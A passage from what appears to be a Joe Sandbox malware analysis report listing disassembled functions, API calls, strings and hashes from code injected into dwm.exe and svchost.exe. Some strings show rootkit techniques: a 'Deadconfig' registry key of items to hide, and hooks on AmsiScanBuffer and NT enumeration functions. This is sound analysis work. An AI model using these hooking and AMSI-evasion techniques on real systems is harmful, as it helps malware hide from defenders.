                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 0d0e01c185eccc3dd7ce781cfc4c52b0c07a5d9784f0925fe970f4753a945d71
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: 81114732608B80C6DB64CB56F49429AB7B4F7C9B84F54412AEE8D83B59CF38C518CB04
                                                        Function 000002BAAF2195F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 4e3e5ba4fd33e08099070b5b44bf6dcb4b0c40132ea89adbf06006fdee3614f2
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 77113632618B8082EB258F25E454359B7A4F788B94F188220EF8C47B68DF3EC955CB54
                                                        Function 000002BAAF21D77C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: 63340a853cb01489453e0ffa3a10237ba9bea2044928fce77fc3b315f2950c6c
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: 88F08237304B80C2FB2C9B95F8586997370AB48B90F944525E90943B95CF3AC94DCB66
                                                        Function 000002BAAF21D728 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • try_get_function.LIBVCRUNTIME ref: 000002BAAF21D751
                                                        • TlsSetValue.KERNEL32(?,?,?,000002BAAF21B50E,?,?,?,000002BAAF21B969,?,?,?,?,000002BAAF21BA1D), ref: 000002BAAF21D768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Valuetry_get_function
                                                        • String ID: FlsSetValue
                                                        • API String ID: 738293619-3750699315
                                                        • Opcode ID: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction ID: 85fff2e6ecbb76e0daeab9c9ea558aae7dcfc0d94370cf8759ede24d3776f7d9
                                                        • Opcode Fuzzy Hash: fc325339b7f97732f837055afb4aa1383e496b4c3619d26f7748048e5b1acc4f
                                                        • Instruction Fuzzy Hash: 7EE06577200500D1FA5C4B60F4686D83371A748780F984125E50586295DF3EC94EC677
                                                        Function 000002BAAF211C28 Relevance: 5.0, APIs: 4, Instructions: 48memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction ID: c067f7acd1e89196e3783257391c205f8fe116815281dc24cc7a733d7dae8095
                                                        • Opcode Fuzzy Hash: 25d11f289d9fbfcfef02ead22fd34e1bae26a1daa0a4a5c4d43c16fe266dba3e
                                                        • Instruction Fuzzy Hash: 9911E523A01B9081EE29CB66A418199B7F0FB88FE0F594324DE59937A4EF39C446C319
                                                        Function 000002BAAF211268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction ID: 33f261878c44d454e83425e827665f9ee78fe2faec3ac6fabf0b33b90e647773
                                                        • Opcode Fuzzy Hash: f083a3077c0b1c945921efc18f57caeeb55b99edd70e436b0099e2dca6254ff4
                                                        • Instruction Fuzzy Hash: 5EE0E573A11A4086E7289FA2D82C35977F1FB88F59F49C024C94947360DF7E889DCBA1
                                                        Function 000002BAAF211000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000010.00000002.3043801395.000002BAAF211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAF210000, based on PE: true
                                                        • Associated: 00000010.00000002.3043750231.000002BAAF210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043868250.000002BAAF223000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043918151.000002BAAF22D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3043973225.000002BAAF22F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000010.00000002.3044026212.000002BAAF235000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_16_2_2baaf210000_dwm.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1617791916-0
                                                        • Opcode ID: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction ID: 3a36dc9d883d0a773f5fb6a36764178119422bf884d11d6e653b7a35f757bda8
                                                        • Opcode Fuzzy Hash: 8415c691aaee8c46f1d02063215c92c698de3b3fb4a93955248209b4c764c50b
                                                        • Instruction Fuzzy Hash: 01E0E573611A4086E7289B62D81C35977B1FB88B15F488024C90947320EF3A889DCA21

                                                        Executed Functions

                                                        Function 0000026A879C3618 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 0000026A879C3631
                                                        • PathFindFileNameW.SHLWAPI ref: 0000026A879C3640
                                                          • Part of subcall function 0000026A879C3C70: StrCmpNIW.SHLWAPI(?,?,?,0000026A879C255A), ref: 0000026A879C3C88
                                                          • Part of subcall function 0000026A879C3BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3BC6
                                                          • Part of subcall function 0000026A879C3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3BF4
                                                          • Part of subcall function 0000026A879C3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3C16
                                                          • Part of subcall function 0000026A879C3BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3C34
                                                          • Part of subcall function 0000026A879C3BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026A879C3657), ref: 0000026A879C3C55
                                                        • CreateThread.KERNELBASE ref: 0000026A879C3687
                                                          • Part of subcall function 0000026A879C1D3C: GetCurrentThread.KERNEL32 ref: 0000026A879C1D47
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: d249b8c202dba67d1c12177d8936cd461ac81744c8d677bc50c9ae3a3067656e
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: D9111E70620A0191FFE4E721E61E36E3EA0B7D4345F914525A90EA76D4EF7BC1049E43
                                                        Function 0000026A87992AB8 Relevance: 1.7, APIs: 1, Instructions: 241libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: cce1f8fd494d7c5da3516ac30c7d3aad8bbb15db083c4b173f88d7174963e4c4
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 9991257370129187FBA4CF25D048B6DF3A1FB58B98F5481259F4A677C8EA39D882CB01
                                                        Function 0000026A879C1AC8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 0000026A879C1628: GetProcessHeap.KERNEL32 ref: 0000026A879C1633
                                                          • Part of subcall function 0000026A879C1628: HeapAlloc.KERNEL32 ref: 0000026A879C1642
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16B2
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DF
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C16F9
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1719
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1734
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1754
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C176F
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C178F
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17AA
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17CA
                                                        • SleepEx.KERNELBASE ref: 0000026A879C1AE3
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17E5
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1805
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1820
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1840
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C185B
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C187B
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1896
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C18A0
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: ab7a3a034934e83ce29a6f4a8018a5758a01cdf26d228072accfee8b63593364
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: 352106F524060181FFD0DB27DD4937D77A8ABC4BD1F0454219E0DA779AFE26C4518E1A

                                                        Non-executed Functions

                                                        Function 0000026A879C81B0 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: 4409cc66789f406f2718870ee03800d9059c48ef06f2607548e2fb15f8da2a2e
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: 64315D72205B80C6EBA0CF60E8947DD7BA0F794745F44402ADA4E57A94EF39C648CB15
                                                        Function 0000026A879CB62C Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 908291b3a408f0758c0ce19692a0e1cfe9b9511c256f66aa3b66fbc447404f85
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: 0F315E36214F8096EBA0CF25E88879E7BA4F7C8758F540116EA8D53BA8DF39C245CB01
                                                        Function 0000026A879D0018 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: ac27a3fc08b5370a634217c466886b5af74a28ca7089373f9386d229a843f4ae
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: 9EE1F072B14B808AEB40CF68D4886DD7FB1F385788F148156DF6E67B99EA39C416CB01
                                                        Function 0000026A8799B150 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: 6be0a7d52cd647924b152b17570311229073571efb6daca2de889de03a8cecf2
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: 3851E172711B9486FF64CFA698097AD37A1F758BE8F844525EE0D27B85EA3AC041C701
                                                        Function 0000026A879C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: 148b937f8c3847ee0b9c210a683df85fe69a89f9778e3f6ddfdabf39c176c33d
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 51713876310A10D6EB90DF26E88869C3FB4FB88B89F405111DE4D63B68EF3AC454CB45
                                                        Function 0000026A879C1D3C Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 0000026A879C1D47
                                                          • Part of subcall function 0000026A879C20C0: GetModuleHandleA.KERNEL32(?,?,?,0000026A879C1D79), ref: 0000026A879C20D8
                                                          • Part of subcall function 0000026A879C20C0: GetProcAddress.KERNEL32(?,?,?,0000026A879C1D79), ref: 0000026A879C20E9
                                                          • Part of subcall function 0000026A879C5F50: GetCurrentThreadId.KERNEL32 ref: 0000026A879C5F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: 9e0e29bd579a548e3cdc1013655345b337472a76a9df8295ccf8e469ac00ce0e
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: 2141A0B0111A4AA4FE84EB68ED597DC3F26E784358FC440139409371759E3ACA9EDFA3
                                                        Function 0000026A879C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
